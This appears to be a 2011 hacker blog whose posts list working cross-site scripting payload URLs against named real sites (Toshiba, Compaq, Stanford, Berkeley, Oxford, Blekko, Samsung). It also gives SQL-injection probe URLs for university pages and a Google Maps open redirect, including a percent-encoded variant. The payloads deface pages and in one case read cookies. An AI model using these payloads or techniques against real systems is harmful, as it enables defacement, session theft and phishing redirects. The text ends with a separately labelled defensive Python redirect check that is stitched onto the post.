Tuesday, 29 November 2011

Toshiba.com and Compaq.com Cross Site Scripting

Browser: Mozilla Firefox.

Toshiba.com

http://vuln.xssed.net/2011/11/29/start.toshiba.com/

http://start.toshiba.com/games/free_online_games.php?cat=%22%3E%3C/title%3E%3Cscript%3Ealert%28%22XSS%20%22%29%3C/script%3E%3Cscript%3Ealert%28%22meow%22%29%3C/script%3E%3Cscript%3Ealert%28%22meow%20by%20Sony%22%29%3C/script%3E%3Cstyle%3Ebody{visibility:hidden;}%20html{background-image:%20url%28http://www.lenagold.ru/fon/peo/part/body09.jpg%29;}%3C/style%3E%27%22%3E%3Cdiv%20style=%22position:%20absolute;left:%20420px;top:%2040px;%E2%80%8B%E2%80%8Bz-index:%2010;visibility:%20visible;%20color:%20White;%20font-size:%2040px;%22%3E%3Cimg%20src=%22http://i1.giftube.ru/multjashki/kot_vygljadyvaet_927ccf5f2ff24217ac6dd26dceed075a.gif%22%20style=%22height:%20400px;%20width:%20500px;%22%3E





Compaq.com

http://vuln.xssed.net/2011/11/29/neptest.nonstop.compaq.com/

https://neptest.nonstop.compaq.com/buildpage.asp?Page=%22%3E%3Cbody%20background=%22http://www.lenagold.ru/fon/ori/sneg/snow29.gif%22%3E%3Cscript%3Ealert%28%22Without%20music,%20life%20would%20be%20a%20mistake..%20By%20Sony%22%29%3C/script%3E%3Cimg%20src=http://media.bigoo.ws/content/christmas/gif_bells/bells_35.gif%20align=center%3E%3Ciframe%20width=%22520%22%20height=%22415%22%20src=%22http://www.youtube.com/embed/BoAKPrzrKPI%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E%3Cimg%20src=http://media.bigoo.ws/content/christmas/gif_bells/bells_35.gif%20align=center%3E%3Cimg%20src=http://foxtrotters.tripod.com/ansnowmn2.gif%20align=center%3E




Sunday, 27 November 2011

Stanford, Berkeley and Oxford XSS + bonus 2 SQL..

Stanford University.

http://www-psearch.slac.stanford.edu/SLACSearch/app/slac/index?qt=%22%3E%3Cscript%3Ealert%28%22.%22%29%3C/script%3E%3E%3Cimg%20src=http://www.gifs.net/Animation11/Computers_and_Technology/Gears/In_the_head.gif%20align=center%3E%3Ciframe%20width=%22560%22%20height=%22315%22%20src=%22http://www.youtube.com/embed/J04lTwix8yA%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E%3Cbody%20background=%22http://www.lenagold.ru/fon/pred/bum/buk/letter88.jpg%22%3E


SLACSearch/app/slac/index?qt=

Simple..


University of California, Berkeley.


https://iris.eecs.berkeley.edu/cgi-bin/search.cgi?query=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E



/cgi-bin/search.cgi?query=

Simple..



Oxford University.


http://www.univ.ox.ac.uk/search.php?keys=%22%3E%3Cbody%20background=%22http://www.lenagold.ru/fon/pred/bum/buk/letter45.jpg%22%3E%3Cscript%3Ealert%28%22http://st2tea.blogspot.com%20by%20Sony%22%29%3C/script%3E%3Ciframe%20width=%22420%22%20height=%22315%22%20src=%22http://www.youtube.com/embed/NerGuAfjDow%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E



/search.php?keys=

Simple..


And 2 SQL..


http://www.begbroke.ox.ac.uk/Media/NewsEvents.php?year=2012'
http://halbook.trinhall.cam.ac.uk/seating_view.php?mealid=721'

Thursday, 24 November 2011

Blekko.com [web search engine] cross site scripting

What is blekko.com?

You can read here:

http://en.wikipedia.org/wiki/Blekko

So, our XSS is in the profile (website link):

http://blekko.com/tag/profile?m=1&email=editpro%2540bk.ru&name=&desc=&website=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cimg%20src=%20http://www.tnr.com/sites/default/files/imagecache/thumbnail_landing/RomaniaFlag.jpg%20align=center%3E%3Cmarquee%20scrollamount=%223%22%3ESystem%20Error..well,%20joke,%20it%27s%20only%20xss..We%20can%20see%20Cross%20Site%20Scripting%20on%20the%20Blekko%20-%20web%20search%20engine.%20By%20Sony.%20http://st2tea.blogspot.com%3C/marquee%3E


Wednesday, 23 November 2011

Winter and Samsung [cross site scripting mini art]

It's an interesting place for XSS.

http://vuln.xssed.net/2011/11/24/chat.support.samsung.com/

http://chat.support.samsung.com/LiveChat/chkCIC?site_cd=AE&jsoncallback=%22%3E%3Cbody%20background=%22http://www.lenagold.ru/fon/ori/sneg/snow29.gif%22%3E%3Cscript%3Ealert%28%22Cheers%20to%20a%20new%20year%20and%20another%20chance%20for%20us%20to%20get%20it%20right.%20By%20Sony%22%29%3C/script%3E%3Ciframe%20width=%22540%22%20height=%22450%22%20src=%22http://www.youtube.com/embed/45wmyMgyZuY%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E%3Cimg%20src=http://media.bigoo.ws/content/christmas/gif_santa_claus/santa_claus_78.gif%20align=center%3E%3Cimg%20src=http://i1.giftube.ru/multjashki/kot_vygljadyvaet_927ccf5f2ff24217ac6dd26dceed075a.gif%20align=center%3E





Wednesday, 2 November 2011

Google Maps Open Redirect




http://maps.google.com/m/preferences?pref=s&bl=//st2tea.blogspot.com&hl=1&safe=strict&safe=images&safe=off&gwt=on&gwt=off&lochist=on&lochist=off&sigp=pref%20bl&sig=AMctaOIRgcTAHYXz1KuVsPHwVpqFKrQCJg

or

http://maps.google.com/m/preferences?pref=s&bl=//%73%74%32%74%65%61%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D&hl=1&safe=strict&safe=images&safe=off&gwt=on&gwt=off&lochist=on&lochist=off&sigp=pref%20bl&sig=AMctaOIRgcTAHYXz1KuVsPHwVpqFKrQCJg
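
The two URLs above differ only in how the `bl` value is written: `//st2tea.blogspot.com` literally, and the same string percent-encoded. As an added example (not part of the original post and not Google's code), here is a server-side check for a redirect parameter that refuses both forms; the names `safe_redirect_target` and `FALLBACK` and the host `maps.example.test` used when calling it are assumptions.

```python
from urllib.parse import unquote, urlsplit

FALLBACK = "/"  # assumption: landing page used when a target is rejected


def _decodings(raw, max_rounds=5):
    """Return raw plus each successive percent-decoding, or None if it never settles."""
    forms = [raw]
    while len(forms) <= max_rounds:
        nxt = unquote(forms[-1])
        if nxt == forms[-1]:
            return forms
        forms.append(nxt)
    return None


def _is_local_path(value):
    # Browsers read "\" as "/" and drop tab/CR/LF, so refuse those outright.
    if "\\" in value or any(ord(c) < 0x20 for c in value):
        return False
    # One leading slash is a path on this site; two start a new authority.
    return value.startswith("/") and not value.startswith("//")


def safe_redirect_target(raw, allowed_hosts=frozenset()):
    """Return raw if it stays on-site or names an allowed host, else FALLBACK."""
    raw = raw.strip()
    forms = _decodings(raw)
    if forms is None:
        return FALLBACK
    # Every decoding level must look local, so a value that only becomes
    # "//host" after a later decode (proxy, framework, browser) is refused too.
    if all(_is_local_path(f) for f in forms):
        return raw
    if "\\" in raw or any(ord(c) < 0x20 for c in raw):
        return FALLBACK
    try:
        parts = urlsplit(raw)
    except ValueError:
        return FALLBACK
    # Absolute URLs only with an explicit http(s) scheme and an exact host match;
    # protocol-relative "//host" has no scheme and is never accepted.
    if parts.scheme in ("http", "https") and parts.hostname in allowed_hosts:
        return raw
    return FALLBACK
```

Call it on the parameter value before issuing the redirect and send the user to whatever it returns.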